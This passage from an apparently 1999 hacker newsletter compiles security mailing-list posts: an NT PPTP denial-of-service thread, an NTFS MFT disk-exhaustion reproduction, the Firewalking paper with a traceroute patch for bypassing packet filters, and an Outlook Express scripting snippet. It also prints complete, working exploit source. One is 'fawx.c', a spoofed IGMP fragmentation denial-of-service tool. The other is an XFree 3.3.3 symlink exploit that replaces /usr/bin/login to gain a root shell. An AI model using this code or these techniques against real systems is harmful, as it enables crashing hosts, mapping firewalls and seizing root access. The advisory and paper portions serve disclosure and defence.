telnet> close
Connection closed.
The instant I hit ^d his server rebooted. AFAIK there is nothing special in
the setup of the NT server.
I hope this clears up the picture.
Cheers
Simon
------------------------------------------------------------------------------
Date: Tue, 27 Apr 1999 10:55:52 -0700
From: Aleph One <aleph1@UNDERGROUND.ORG>
To: BUGTRAQ@netspace.org
Subject: Re: Possible DOS in WinNT RAS (PPTP)
Summary of this thread.
Didn't work:
NT 4.0 SP4, RRAS - Chris Alliey <calliey@erols.com>
NT 4.0 Server SP3, 128-bit, no RAS - Russ <Russ.Cooper@rc.on.ca>
NT 4.0 Server SP3, PPTP3-fix, no RAS 128-bit - Russ <Russ.Cooper@rc.on.ca>
NT 4.0 Server SP4, 128-bit, no RAS - Russ <Russ.Cooper@rc.on.ca>
NT 4.0 Server SP4 - Lewman, Andrew <ALewman@Lifespan.org>
NT 4.0 Server Enterprise, SP4 - Lewman, Andrew <ALewman@Lifespan.org>
Yes:
NT 4.0 SP4, Option Pack - Huang Min <hmin@dns.cqpn.gov.cn>
NT 4.0 Server, SP4, 40-bit, RAS - Simon Helson <simon@concepts.co.nz>
Hardware or device driver error, or maybe an issue with RAS but not RRAS?
--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
@HWA
14.0 MFT problem could cause you to have to reformat your drive (NTFS)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Tue, 27 Apr 1999 18:26:54 +0400
From: Vladimir Dubrovin <vlad@sandy.ru>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: MFT problem
Hello NTBUGTRAQ,
Sorry for my bad English...
Some times ago it was noticed the problem with MFT. I don't know if
this problem was discussed in this list, so if it is - just discard
this message.
The problem is:
Then creating a very large number of empty files on NTFS partition and
then removing this files you loose a lot of space (up to 90% of
volume!) and you couldn't recover this space without reformatting the
NTFS volume. This problem occurs because NT allocates space in MFT
(Master File Table, an internal NTFS database). Then the MFT reserved
space ends NT allocates new space for MFT. The space allocated for MFT
will never be released. (information "How NTFS Reserves Space for its
Master File Table (MFT)" can be found in KB article Q174619).
Then creating empty file (with zero length) it takes disk space
olny in directory entry and MFT table. If you'll fill your NTFS volume
with such files and then delete them the MFT table will take the most
of your hard drive space (up to 90% as it was noticed before).
You can reproduce this problem next way:
It's better to use empty NTFS volume of small size - 50-100Mb - the
results will be more distinctive.
Check the free space on your NTFS volume.
md temp
for /L %i in (1,1,1000000) do type nul >temp/file.%i.tmp
then you fill all the partition with this files - abort the circle.
del /Q temp\*.*
del /Q temp
Now you can check free space on your hard drive. You've loosed it
almost completely...
By the way: it seems
dir /A $MFT
doesn't shows real MFT size, as it described in Microsoft
documentation. At least you will never find the space you've loosed in
any special file. But you can try some other utility, such as
defragmentation utilities - usually they shows MFT reserved space...
The problem is, that any user, who has "create" permition in any
directory on NTFS volume can bring this volume down.
It's specially interesting if your FTP server has "incoming"
directory, or you offer free HTML pages for your customers on NTFS
volume...
This problem isn't solvable with some kind of disk quotas,
because the files are empty...
I've contacted Vitaly Savenkov from Russian department of Microsoft,
russia@microsoft.com.
He forwarded me reply from developers:
<><><><><><><>
Dear ...,
I'm sorry that I have to tell you the following.
-
My investigations and the answers from our Secondary Response Group
confirmed, that the $MFT will never shrink.
The only way is to reformat the Partition.
This behavior is the drawback resulting from optimizing the
NTFS performance. The main goal was to avoid fragmentation.
-
Possibly the best resolution for your situation is to use a
single partition for the FTP Data. If the available space then
goes under an acceptable level you can backup this partition
and reformat it.
I checked this with our Escallation Team and so i can say that
this behavior of NTFS will not be changed.
best regards,
...
<><><><><><><>
So, now you can check it...
+=-=-=-=-=-=-=-=-=+
|Vladimir Dubrovin|
| CSS Coordinator |
| Sandy Info, ISP |
=+=-=-=-=-=-=-=-=-=+=-=
@HWA
15.0 Firewalking, a paper to determine gateway access control lists
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From PacketStorm Security
http://www.genocide2600.com/~tattooman/unix-audit/firewalk/
------------------------------------------------------------------------------------
Firewalking
A Traceroute-Like Analysis of IP Packet Responses to Determine Gateway
Access Control Lists
Cambridge Technology Partners'
Enterprise Security Services
David Goldsmith
Senior Security Architect
dhg@es2.net
Michael Schiffman
Senior Security Architect
mds@es2.net
October 1998
Contents of this document are Copyright (c) 1998 Cambridge Technology Partners
Enterprise Security Services, Inc. Distribution is unlimited under the
condition that due credit is given and no fee is charged.
ESS is a division of Cambridge Technology Partners, Inc.
TABLE OF CONTENTS
i. Terminology
ii. A note about examples
I. Introduction
II. Traceroute
III. Information gathering using traceroute
IV. Firewalking
V. Firewalk - The tool
VI Risk Mitigation
i. Terminology
ACL Access Control List. A set of rules that enforce a security
policy. In the scope of this paper, an Access Control List
will solely apply to network policy.
Router/Gateway Used interchangeably. In the scope of this report, they refer
to a multi-homed host that is configured to forward IP
datagrams. It may or may not have a packet filtering ACL in
place that denies some network traffic.
Ingress traffic Describes network traffic that originates from the outside
of a network perimeter and progresses towards the inside.
Egress traffic Describes network traffic that originates from the inside of a
network perimeter and progresses towards the outside.
Firewall Refers to a multi-homed host configured to forward IP
datagrams which uses a packet filtering ACL to control
network traffic.
ii. A note about examples
There are several sample traceroute dumps used in this report. The astute
reader will note that the IP addresses are RFC 1918[1] compliant non-routable
internal network addresses. The empirical data and traceroute dumps are taken
directly from live Inte rnet hosts1, and in order to protect their identity,
we have changed the addresses to anonymize the machines and networks involved.
iii. A note about diagrams
There are none in this ASCII version. For the real deal, check out one of the
grapical formats from http://www.es2.net/research/firewalk.
I. Introduction
This paper describes Firewalking, a technique that can be used to gather
information about a remote network protected by a firewall. The purpose
of the paper is to examine the risks that this technique represents. This
paper is intended for a technical audience with an advanced understanding of
network infrastructure and TCP/IP packet structures.
Firewalking uses a traceroute-like IP packet analysis to determine whether or
not a particular packet can pass from the attacker's host to a destination
host through a packet-filtering device. This technique can be used to map
'open' or 'pass through' ports on a gateway. More over, it can determine
whether packets with various control information can pass through a given
gateway. Also, using this technique, an attacker can map routers behind a
packet-filtering device. To fully understand how this technique works, we
first need to understand how traceroute works. This paper provides an
introduction to traceroute.
II. Traceroute
Traceroute [1] is a network debugging utility designed to map out all hosts en
route to a particular destination. Traceroute works by sending UDP or ICMP
echo (ping)2 packets to a destination host and monotonically increasing the
time to live (TTL) field in the IP header each successive round (by default, a
round consists of three packets or probes). If the traceroute scan is done
using UDP the destination port will be incremented with each probe sent.
The IP TTL field is used to limit the lifetime of datagrams across the
Internet and is decremented just before a router forwards a packet. If this
reduction would cause the TTL to be 0 or less, the router in question will
send back an ICMP error message (time to live exceeded in transit) to the
original host. This lets the original host know at which router the packet
expired. By starting the TTL at one, routers between two given hosts can be
found by increasing the TTL and monitoring the ICMP responses (provided there
isn't any prohibitive filtering or any severe packet loss). To ensure that it
gets a proper response from the ultimate destination host (an ICMP port
unreachable or an ICMP echo reply) traceroute will either pick a high UDP port
that is unlikely to be used by any application or use ping packets.
III. Information gathering using traceroute
With an understanding of how traceroute works, we can now explore how this can
this be used to leverage information about a particular network. This section
will demonstrate two different ways of using traceroute to do some network
reconnaissance. These following examples are contrived to show specific
situations that may or may not be commonplace.
- Protocol subterfuge
The first scenario involves a network protected by a firewall that is blocking
all ingress traffic except for ping and ping responses (ICMP types 8 and 0
respectively). We can use the stock traceroute program to show us what hosts
are behind this filter (which is presumably against the security policy).
Instead of the default behavior of using UDP (Figure 1), we want to force
traceroute to use ICMP packets (Figure 2). Notice that this time we are
able to view hosts behind the firewall.
zuul:~>traceroute 10.0.0.10
traceroute to 10.0.0.10 (10.0.0.10), 30 hops max, 40 byte packets
1 10.0.0.1 (10.0.0.1) 0.540 ms 0.394 ms 0.397 ms
2 10.0.0.2 (10.0.0.2) 2.455 ms 2.479 ms 2.512 ms
3 10.0.0.3 (10.0.0.3) 4.812 ms 4.780 ms 4.747 ms
4 10.0.0.4 (10.0.0.4) 5.010 ms 4.903 ms 4.980 ms
5 10.0.0.5 (10.0.0.5) 5.520 ms 5.809 ms 6.061 ms
6 10.0.0.6 (10.0.0.6) 9.584 ms 21.754 ms 20.530 ms
7 10.0.0.7 (10.0.0.7) 89.889 ms 79.719 ms 85.918 ms
8 10.0.0.8 (10.0.0.8) 92.605 ms 80.361 ms 94.336 ms
9 * * *
10 * * *
Figure 1
zuul:~>traceroute -I 10.0.0.10
traceroute to 10.0.0.10 (10.0.0.10), 30 hops max, 40 byte packets
1 10.0.0.1 (10.0.0.1) 0.540 ms 0.394 ms 0.397 ms
2 10.0.0.2 (10.0.0.2) 2.455 ms 2.479 ms 2.512 ms
3 10.0.0.3 (10.0.0.3) 4.812 ms 4.780 ms 4.747 ms
4 10.0.0.4 (10.0.0.4) 5.010 ms 4.903 ms 4.980 ms
5 10.0.0.5 (10.0.0.5) 5.520 ms 5.809 ms 6.061 ms
6 10.0.0.6 (10.0.0.6) 9.584 ms 21.754 ms 20.530 ms
7 10.0.0.7 (10.0.0.7) 89.889 ms 79.719 ms 85.918 ms
8 10.0.0.8 (10.0.0.8) 92.605 ms 80.361 ms 94.336 ms
9 10.0.0.9 (10.0.0.9) 94.127 ms 81.764 ms 96.476 ms
10 10.0.0.10 (10.0.0.10) 96.012 ms 98.224 ms 99.312 ms
Figure 2
- Nascent port seeding
The second scenario involves a more common example of a network protected
by a firewall which blocks all ingress traffic except for UDP port 53
(Domain Name Service or DNS).
zuul:~>traceroute 10.0.0.10
traceroute to 10.0.0.10 (10.0.0.10), 30 hops max, 40 byte packets
1 10.0.0.1 (10.0.0.1) 0.540 ms 0.394 ms 0.397 ms
2 10.0.0.2 (10.0.0.2) 2.455 ms 2.479 ms 2.512 ms
3 10.0.0.3 (10.0.0.3) 4.812 ms 4.780 ms 4.747 ms
4 10.0.0.4 (10.0.0.4) 5.010 ms 4.903 ms 4.980 ms
5 10.0.0.5 (10.0.0.5) 5.520 ms 5.809 ms 6.061 ms
6 10.0.0.6 (10.0.0.6) 9.584 ms 21.754 ms 20.530 ms
7 10.0.0.7 (10.0.0.7) 89.889 ms 79.719 ms 85.918 ms
8 10.0.0.8 (10.0.0.8) 92.605 ms 80.361 ms 94.336 ms
9 * * *
10 * * *
Figure 3
As you can see from figure 3, the traceroute scan is blocked at the 8th
hop because no traffic is allowed entrance into the network except for DNS
queries. Armed with this knowledge, we can easily map hosts behind the gateway.
We can control the following:
* The starting source port of the traceroute (which, by default,
increases monotonically as each probe is sent).
* The number of probes sent each round (by default this is 3).
We can determine the following:
* The number of hops in between our attacking host and the target firewall.
This information allows us to deterministically control the port number of the
probe that will reach the firewall. Due to the fact that the firewall does no
content analysis, we can fool it into thinking our packets are DNS queries,
and therefore, we can bypass the ACL. We simply begin our scan with a
starting port number of:
(target_port - (number_of_hops * num_of_probes)) - 1
If you are more then (target_port - 1) number of hops from your destination
this method obviously will not work. For our above example this gives us:
(53 - (8 * 3)) - 1 = 28
The probe that reaches the filter will have an acceptable port number as
dictated by the firewall's ACL and will be allowed to pass unmolested
(Figure 4).
zuul:~>traceroute -p28 10.0.0.10
traceroute to 10.0.0.10 (10.0.0.10), 30 hops max, 40 byte packets
1 10.0.0.1 (10.0.0.1) 0.501 ms 0.399 ms 0.395 ms
2 10.0.0.2 (10.0.0.2) 2.433 ms 2.940 ms 2.481 ms
3 10.0.0.3 (10.0.0.3) 4.790 ms 4.830 ms 4.885 ms
4 10.0.0.4 (10.0.0.4) 5.196 ms 5.127 ms 4.733 ms
5 10.0.0.5 (10.0.0.5) 5.650 ms 5.551 ms 6.165 ms
6 10.0.0.6 (10.0.0.6) 7.820 ms 20.554 ms 19.525 ms
7 10.0.0.7 (10.0.0.7) 88.552 ms 90.006 ms 93.447 ms
8 10.0.0.8 (10.0.0.8) 92.009 ms 94.855 ms 88.122 ms
9 10.0.0.9 (10.0.0.9) 101.163 ms * *
10 * * *
Figure 4
You will notice that the scan terminates immediately after the target port
is passed. This is due to the fact that traceroute continues to increase
the port numbers for each probe sent. The probe immediately after the
successful one will be denied by the ACL on the firewall. To possibly get
further, a simple modification to traceroute can be done to add a command
line switch to stop port incrementation (Figure 5). This allows us to force
every probe we send to be acceptable to the firewall's ACL (a side effect
being that we might not get the normal ICMP unreachable message from the
ultimate destination due to the fact that there might actually be something
listening on the other end). See appendix A for the source code patch.
zuul:~>traceroute -S -p53 10.0.0.15
traceroute to 10.0.0.15 (10.0.0.15), 30 hops max, 40 byte packets
1 10.0.0.1 (10.0.0.1) 0.516 ms 0.396 ms 0.390 ms
2 10.0.0.2 (10.0.0.2) 2.516 ms 2.476 ms 2.431 ms
3 10.0.0.3 (10.0.0.3) 5.060 ms 4.848 ms 4.721 ms
4 10.0.0.4 (10.0.0.4) 5.019 ms 4.694 ms 4.973 ms
5 10.0.0.5 (10.0.0.5) 6.097 ms 5.856 ms 6.002 ms
6 10.0.0.6 (10.0.0.6) 19.257 ms 9.002 ms 21.797 ms
7 10.0.0.7 (10.0.0.7) 84.753 ms * *
8 10.0.0.8 (10.0.0.8) 96.864 ms 98.006 ms 95.491 ms
9 10.0.0.9 (10.0.0.9) 94.300 ms * 96.549 ms
10 10.0.0.10 (10.0.0.10) 101.257 ms 107.164 ms 103.318 ms
11 10.0.0.11 (10.0.0.11) 102.847 ms 110.158 ms *
12 10.0.0.12 (10.0.0.12) 192.196 ms 185.265 ms *
13 10.0.0.13 (10.0.0.13) 168.151 ms 183.238 ms 183.458 ms
14 10.0.0.14 (10.0.0.14) 218.972 ms 209.388 ms 195.686 ms
15 10.0.0.15 (10.0.0.15) 236.102 ms 237.208 ms 230.185 ms
Figure 5
- Taking it a bit further
Since the magic of traceroute is all happening at the IP layer, any transport
protocol (UDP, TCP and ICMP) can be used. The foundation laid down by
traceroute can extend to any other protocol on top on IP. If we attempt to
traceroute to a machine behind a firewall and the probe reaching the firewall
is prohibited by an ACL filter, the packet will be dropped on the floor (in
most cases). All we can determine from the traceroute scan is the last
gateway (in this case, a firewall) that responded. This is good entropic
information. This firewall can then become a waypoint that we use to
determine the success of future probes. If we traceroute to a machine behind
this firewall with a different (protocol) traceroute probe, and we get a
response, we know two things: 1) that particular kind of traffic is passed by
the firewall, and 2) we know a host behind the firewall. If we only get as
far as our waypoint, we know that traffic type is filtered. This is the basis
for firewalking.
IV. Firewalking
In order to use a gateway's response to gather information, we must know two
pieces of information:
- The IP address of the last known gateway before the firewalling takes place
- The IP address of a host located behind the firewall.
The first IP address serves as our metric (waypoint from the above example),
if we can't get a response past that machine, then we assume that whatever
protocol we tried to pass is being blocked3. The second IP address is used as
a destination to direct the packet flow (Figure 6).
[ image ]
Using this technique, we can perform several different information gathering
attacks. One attack is a firewall protocol scan, which will determine what
ports/protocols a firewall will let traffic through on from the attacking
host. This would attempt to pass packets on all ports and protocols and
monitor the responses. A second potential threat is advanced network mapping.
By sending packets to every host behind a packet filter, an attacker can
generate an accurate map of a network's topology.
V. Firewalk - The tool
While traceroute is a useful application, it is not very extensible for any
kind of serious reconnaissance scanning; to this end, the proof of concept
tool, firewalk, was built.
- Fire, walk with me where?
Firewalk is a network-auditing tool that employs the techniques described
above. It attempts determines what transport protocols a given gateway
will let through. The firewalk scan works by sending out TCP or UDP packets
with an IP TTL one greater then the targeted gateway. If the gateway allows
the traffic, it will forward the packets to the next hop where they will
expire and elicit a TTL exceeded in transit message. If the gateway host does
not allow the traffic, it will likely drop the packets on the floor and we
will see no response. By sending probes in a successive manner and recording
which ones answer and which ones don't, the access list on the gateway can be
determined.
- 2 Phases
To work its magic, firewalk has two phases, a network discovery phase, and a
scanning phase. Initially, to get the correct IP TTL (that will result in
expired packets one beyond the gateway) we need to 'ramp up' hop counts. We
do TTL ramping in the same manner that traceroute works, sending packets out
with successively incremented IP TTLs, towards the destination host. Once
we know the gateway hopcount (at that point the scan is 'bound') we can move
onto the next phase, the actual scan.
The actual scan is simple. Firewalk sends out TCP or UDP packets and sets
a timeout; if it receives a response before the timer expires, the port is
considered open, if it doesn't, the port is considered closed (Figure 7).
zuul:#firewalk -n -P1-8 -pTCP 10.0.0.5 10.0.0.20
Firewalking through 10.0.0.5 (towards 10.0.0.20) with a maximum of 25 hops.
Ramping up hopcounts to binding host...
probe: 1 TTL: 1 port 33434: <response from> [10.0.0.1]
probe: 2 TTL: 2 port 33434: <response from> [10.0.0.2]
probe: 3 TTL: 3 port 33434: <response from> [10.0.0.3]
probe: 4 TTL: 4 port 33434: <response from> [10.0.0.4]
probe: 5 TTL: 5 port 33434: Bound scan: 5 hops <Gateway at 5 hops> [10.0.0.5]
port 1: open
port 2: open
port 3: open
port 4: open
port 5: open
port 6: open
port 7: *
port 8: open
13 packets sent, 12 replies received
Figure 7
- A Slow Walk
As noted above, packets on an IP network can be dropped for a variety of
reasons. When a packet is dropped for any reason other then it being denied
by a filter, it is extraneous loss. For our firewalk scan to be accurate,
we need to limit this extraneous packet loss to the best of our ability. The
best we can do in most cases is to be redundant with the number of probes
we send. Unless there is severe network congestion some of the probes should
get through. However, what if the probe we send is filtered or dropped by a
different gateway while en route to the target gateway (see figure 8).
[ image ]
To firewalk, this will look like the target gateway has denied the packet,
which, in this case, is certainly a false negative. This is not extraneous
loss, so simply sending more packets will not help. To prevent this, we must
perform a `slow walk` or a `creeping walk`. This is akin to a normal scan,
however we scan each hop en route to the target. We perform a standard
firewalk ramping phase, and then scan each intermediate hop up to the
destination. This allows prevents false negatives due to intermediate filter
blockage and allows firewalk to be more confident in its report. The major
benefit is that we can now determine if blocked ports are false negatives.
The drawback is that it is, as it's name states, slow.
More information about Firewalk (including the source) is available from
http://www.es2.net/research/firewalk.
VI. Risk Mitigation
The easiest solution to this problem is to disallow ICMP TTL Exceeded
messages from leaving an internal network. This will also have the effect
of breaking valid uses of traceroute and may inhibit remote diagnostics of
an internal network problem.
Another defense against firewalking is the use of some form of proxy server.
Network Address Translation (NAT) or any proxy server (both application
level and circuit level) can prevent Firewalk from probing behind them. While
network based intrusion detection tools could detect certain attacks [3];
it is possible to develop a version of Firewalk that would generate packets
that would look like valid packets for each service that it is scanning.
Currently, Firewalk only fills in the packet header and does not insert any
data into a packet. A more sophisticated version could emulate various
services in an attempt to masquerade as valid traffic and randomize the order
and times that it scans services.
Appendix A. traceroute static port diff
Apply this diff to traceroute version 1.4a5 to add support for static
destination ports. Apply the diff using the unix patch program from the
traceroute source directory:
---------------------8<-------- traceroute.diff ------------------------------
--- traceroute.c.orig Fri Aug 21 15:15:23 1998
+++ traceroute.c Sun Aug 23 18:58:08 1998
@@ -289,6 +289,7 @@
int nprobes = 3;
int max_ttl = 30;
int first_ttl = 1;
+int static_port = 0;
u_short ident;
u_short port = 32768 + 666; /* start udp dest port # for probe packets */
@@ -352,7 +353,7 @@
prog = argv[0];
opterr = 0;
- while ((op = getopt(argc, argv, "dFInrvxf:g:i:m:p:q:s:t:w:")) != EOF)
+ while ((op = getopt(argc, argv, "dFInrvxf:g:i:m:p:q:Ss:t:w:")) != EOF)
switch (op) {
case 'd':
@@ -406,6 +407,13 @@
options |= SO_DONTROUTE;
break;
+ case 'S':
+ /*
+ * Tell traceroute to not increment the destination
+ * port, useful for bypassing some packet filters.
+ * Useless without the -p option.
+ static_port = 1;
+ break;
case 's':
/*
* set the ip source address of the outbound
@@ -744,7 +752,7 @@
register struct ip *ip;
(void)gettimeofday(&t1, &tz);
- send_probe(++seq, ttl, &t1);
+ send_probe(static_port ? seq : ++seq, ttl, &t1);
while ((cc = wait_for_reply(s, from, &t1)) != 0) {
(void)gettimeofday(&t2, &tz);
i = packet_ok(packet, cc, from, seq);
@@ -1300,9 +1308,9 @@
extern char version[];
Fprintf(stderr, "Version %s\n", version);
- Fprintf(stderr, "Usage: %s [-dFInrvx] [-g gateway] [-i iface] \
-[-f first_ttl] [-m max_ttl]\n\t[ -p port] [-q nqueries] [-s src_addr] [-t tos] \
-[-w waittime]\n\thost [packetlen]\n",
+ Fprintf(stderr, "Usage: %s [-dFInrSvx] [-g gateway] [-i iface] \
+[-f first_ttl]\n\t[-m max_ttl] [ -p port] [-q nqueries] [-s src_addr] \
+[-t tos]\n\t[-w waittime] host [packetlen]\n",
prog);
exit(1);
}
---------------------8<-------- traceroute.diff ------------------------------
Appendix B. References
[1] Y. Rekhter, B. Moskowitz, D. Karrenberg, G. J. de Groot and E. Lear,
"Address Allocation for Private Internets" RFC1918, February 1996
[2] Van Jacobson, traceroute documentation and source code, Lawrence
Berkeley National Laboratory
[3] Thomas H. Ptacek and Timothy Newsham, "Insertion, Evasion, and Denial
of Service: Eluding Network Intrusion Detection", Secure Networks,
January 1998
1 In fact, in the traceroute dumps, the original RTTs (round-trip times)
are left in as they appeared.
2 Traceroute version 1.4a5 (ftp://ee.lbl.gov/traceroute1.4a5.tar.Z)
allows for ICMP echo based traceroutes via the -I flag. Windows NT's
version of traceroute 'tracert' exclusively uses ICMP echoes.
3 It should be noted that the assumption that it is our target gateway
that is dropping the traffic may not be correct. There are several things
that could cause a false positive in this case:
- A host could also be down or simply not responding.
- IP is unreliable. Packets can be dropped for any number of reasons.
- The packet could also be dropped by a previous filtering gateway
before it ever reaches our target gateway host.
4 It is significant to note that the ultimate destination host does not
have to be reached. It just needs to be somewhere downstream, on the
other side of the gateway from the firewalking host.
5 If an intermediate filter is shown to drop packets, this prevents
firewalk from scanning the actual target machine for the blocked packet
type, on that route. This is annoying.
EOF
@HWA
16.0 IGMP+8 fragmentation attack for Linux
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/* fawx.c v1 by ben-z -- igmp-8+frag attack for linux *
* thanks to datagram for ssping.c - helped lots *
* -------------------------------------------------- *
* DESCRIPTION: *
* Sends oversized fragmented IGMP packets to a box *
* either making it freeze (WinNT/9x), or lagging *
* it to hell and back. Since most win32 firewalls *
* dont support IGMP, the attack successfully *
* penetrates into the system, making it much more *
* effective than an ICMP attack which is likely to *
* be filtered. *
* GREETINGS: *
* mad props to datagram for writing ssping, also *
* thanks to #fts(2) on undernet and the psychic *
* crew on efnet. shouts to ka0z, cyrus, magicfx, *
* ice-e, zeronine, soupnazi, benito, eklipz, c0s, *
* metalman, chawp, folk, atomic-, dethwish, sindawg *
* mosthated, and everyone on irc.slacknet.org.. */
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/igmp.h>
void banner(void) {
printf(" -----------------------------------------------\n");
printf("| fawx v1 by ben-z: igmp-8+frag spoofing attack |\n");
printf(" -----------------------------------------------\n");
}
void usage(const char *progname) {
printf("[**] syntax: %s <spoof host> <target host> <number>\n",progname);
}
int resolve( const char *name, unsigned int port, struct sockaddr_in *addr ) {
struct hostent *host;
memset(addr,0,sizeof(struct sockaddr_in));
addr->sin_family = AF_INET;
addr->sin_addr.s_addr = inet_addr(name);
if (addr->sin_addr.s_addr == -1) {
if (( host = gethostbyname(name) ) == NULL ) {
fprintf(stderr,"\nuhm.. %s doesnt exist :P\n",name);
return(-1);
}
addr->sin_family = host->h_addrtype;
memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);
}
addr->sin_port = htons(port);
return(0);
}
unsigned short in_cksum(addr, len)
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)w ;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
int send_fawx(int socket,
unsigned long spoof_addr,
struct sockaddr_in *dest_addr) {
unsigned char *packet;
struct iphdr *ip;
struct igmphdr *igmp;
int rc;
packet = (unsigned char *)malloc(sizeof(struct iphdr) +
sizeof(struct igmphdr) + 8);
ip = (struct iphdr *)packet;
igmp = (struct igmphdr *)(packet + sizeof(struct iphdr));
memset(ip,0,sizeof(struct iphdr) + sizeof(struct igmphdr) + 8);
ip->ihl = 5;
ip->version = 4;
ip->id = htons(34717);
ip->frag_off |= htons(0x2000);
ip->ttl = 255;
ip->protocol = IPPROTO_IGMP;
ip->saddr = spoof_addr;
ip->daddr = dest_addr->sin_addr.s_addr;
ip->check = in_cksum(ip, sizeof(struct iphdr));
igmp->type = 8;
igmp->code = 0;
if (sendto(socket,
packet,
sizeof(struct iphdr) +
sizeof(struct igmphdr) + 1,0,
(struct sockaddr *)dest_addr,
sizeof(struct sockaddr)) == -1) { return(-1); }
ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct igmphdr) + 8);
ip->frag_off = htons(8 >> 3);
ip->frag_off |= htons(0x2000);
ip->check = in_cksum(ip, sizeof(struct iphdr));
igmp->type = 0;
igmp->code = 0;
if (sendto(socket,
packet,
sizeof(struct iphdr) +
sizeof(struct igmphdr) + 8,0,
(struct sockaddr *)dest_addr,
sizeof(struct sockaddr)) == -1) { return(-1); }
free(packet);
/* printf("."); <- it looked way too ugly :P */
return(0);
}
int main(int argc, char * *argv) {
struct sockaddr_in dest_addr;
unsigned int i,sock;
unsigned long src_addr;
banner();
if ((argc != 4)) {
usage(argv[0]);
return(-1);
}
if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
fprintf(stderr,"error opening raw socket. <got root?>\n");
return(-1);
}
if (resolve(argv[1],0,&dest_addr) == -1) { return(-1); }
src_addr = dest_addr.sin_addr.s_addr;
if (resolve(argv[2],0,&dest_addr) == -1) { return(-1); }
printf("[**] sending igmp-8+frag attacks to: %s.",argv[2]);
for (i = 0;i < atoi(argv[3]);i++) {
if (send_fawx(sock,
src_addr,
&dest_addr) == -1) {
fprintf(stderr,"error sending packet. <got root?>\n");
return(-1);
}
usleep(10000);
}
printf(" *eof*\n");
}
@HWA
17.0 Local XFree 3.3.3 symlink root compromise..(freeBSD+others)......
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/*** local XFree 3.3.3-symlink root-compromise.
*** Tested under FreeBSD 3.1 (but should work on others 2)
*** (C) 1999/2000 by Stealthf0rk for the K.A.L.U.G.
*** (check out http://www.kalug.lug.net/stealth or /coding for
*** other kewl stuff!)
***
*** FOR EDUCATIONAL PURPOSES ONLY!!! USE IT AT YOUR OWN RISK.
*** Even if this program restores all, you should backup your
*** login before running this.
***/
#include <stdio.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#define LOGIN "/usr/bin/login"
#define TELNET "/usr/bin/telnet"
int cp(const char*, const char*, int);
int main(int argc, char **argv)
{
char *telnet[] = {TELNET, "localhost", NULL};
char *shell[] = {"/bin/sh", NULL};
char *X[] = {"/usr/X11R6/bin/xinit", NULL};
FILE *f = NULL;
int p = 0;
char buf[1000] = {0};
/* the rootshell */
if (!geteuid() || !getuid()) {
unlink(LOGIN);
cp("/tmp/L", LOGIN, 1);
chmod(LOGIN, 04555);
printf("Welcome!\n");
unlink("/tmp/.X11-unix");
unlink("/tmp/L");
execve(*shell, shell, NULL);
}
/* back up */
cp(LOGIN, "/tmp/L", 1);
if (symlink(LOGIN, "/tmp/.X11-unix") < 0) {
perror("symlink (/tmp/.X11-unix)");
exit(errno);
}
if ((p = fork()) < 0) {
perror("fork");
exit(errno);
} else if (p > 0) {
sleep(7);
kill(p, 9);
cp(argv[0], LOGIN, 1);
execve(telnet[0], telnet, NULL);
perror("fatal:");
} else {
printf("Xfree 3.3.3 root-sploit by Stealth. http://www.kalug.lug.net\n");
printf("\n-> Please give me some seconds... <-\n\n");
execve(X[0], X, NULL);
}
return 0;
}
int cp(const char *from, const char *to, int how)
{
int in = 0, out = 0, r = 0;
char buf[1000] = {0};
printf("cp %s %s\n", from, to);
/* overwrite ? */
if (how == 1)
how = O_RDWR|O_TRUNC|O_CREAT;
else
how = O_RDWR|O_CREAT;
if ((out = open(to, how)) < 0) {
perror("open 1");
exit(errno);
}
if ((in = open(from, O_RDONLY)) < 0) {
perror("open 2");
exit(errno);
}
while ((r = read(in, buf, 1000-1)) > 0) {
write(out,buf,r);
memset(buf,0,1000);
}
close(in); close(out);
return 0;
}
@HWA
18.0 Microsoft Outlook Express internet zone vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Mon, 26 Apr 1999 05:07:19 -0700
From: "1nternal @geocities.com" <1nternal@MY-DEJANEWS.COM>
To: BUGTRAQ@netspace.org
Subject: Minor privacy exploit in Outlook Express
Outlook Express uses HTML to display ceratin information in the 'outlook today' type part of outlook
express, ie, the number of unread messages in your inbox etc...
Because it is considered to be in the 'internet zone', this information needs to be safely scriptable,
thus it can be accessed by any site in this zone. This allows for a possible (although admittedly minor)
privacy and possibly security problem.
The 'problem' lies in the 'OutlookExpress.MessageList' ActiveX control, which is marked safe for
scripting, it allows for counting the number of messages in any folder within outlook express, as well as
the number of unread items and a few other things, such as setting options, however, the options are only
set for that instance only and are not saved.
An example of viewing the number of messages in a folder, as well as previewing the message (creating the
file 'C:\oe_prev$.eml' without the users permission). It should be noted that this preview message is not
accessible remotely(without an exploit).
<script language="VBSCRIPT"><!--
set MsgList = CreateObject("OutlookExpress.MessageList")
MsgList.Folder = 6
msgbox(MsgList.Count)
location.href = MsgList.PreviewMessage
--></script>
Obviously, this could also be done in JavaScript, however it would still require activeX support and OE5.
1nternal@my-dejanews.com
@HWA
19.0 Big Brother 1.09b/c security notice.
